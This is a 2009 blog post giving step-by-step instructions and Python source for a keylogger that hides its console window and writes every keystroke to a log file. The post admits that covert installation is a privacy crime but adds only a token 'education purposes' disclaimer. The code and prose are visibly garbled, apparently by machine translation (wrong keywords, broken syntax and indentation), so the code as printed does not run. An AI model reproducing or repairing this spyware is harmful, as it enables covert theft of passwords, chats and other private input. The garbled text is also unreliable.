Saturday, December 12, 2009

As we all surely know, a keylogger is a program that can intercept everything the user types on the keyboard of your computer. And I suppose you know so well, precisely for this characteristic, the keylogger is software that does not always lend itself to use proper legal, so much so that now almost all have antivirus features to recognize the presence of a keylogger active in the background.

So the installation of a keylogger on a computer without the knowledge of the rightful owner, is configured as a real crime of violation of privacy: the intercepted data (chat sessions, usernames and passwords, email, ...) in fact are usually saved to a log file that the owner of the keylogger retrieve it later or even the are automatically sent via email.

Educational purposes only, we will see how we can create a simple keylogger fully functional, using the Python. Here are the steps to follow:

  1. Download and install the necessary software:
  2. From the Start menu, select "Python 2.6> PythonWin" to start the editor
  3. From the menu select "File> New", then choose the "Python Script" and give "OK"
  4. Paste the following source (attention to indentation)

    import WIN32API 
    import win32console
    import win32gui

    import pythoncom, pyHook

    win32console.GetConsoleWindow win = ()
    win32gui.ShowWindow (win, 0)

    final OnKeyboardEvent (event):
    if event.Ascii == 5:
    _exit (1)

    if event.Ascii! = 0 or 8:
    f = open ( 'c: \ output.txt', 'r')
    buffer = ()
    f.close ()
    f = open ( 'c: \ output.txt', 'w')
    keylogs = chr (event.Ascii)
    if event.Ascii == 13:
    keylogs = '/ n'
    buffer + = keylogs
    f.write (buffer)
    f.close ()

    hm = pyHook.HookManager ()
    hm.KeyDown = OnKeyboardEvent
    hm.HookKeyboard ()
    pythoncom.PumpMessages ()
5. Save the file in c: \ as "," then by PythonWin type CTRL + R: the keylogger will come started in the background and will run until the log file "C: \ output.txt" anything that will typed on the keyboard.

6.Use any way use like....

This is use for education purpose. Please Dont no use illegally....

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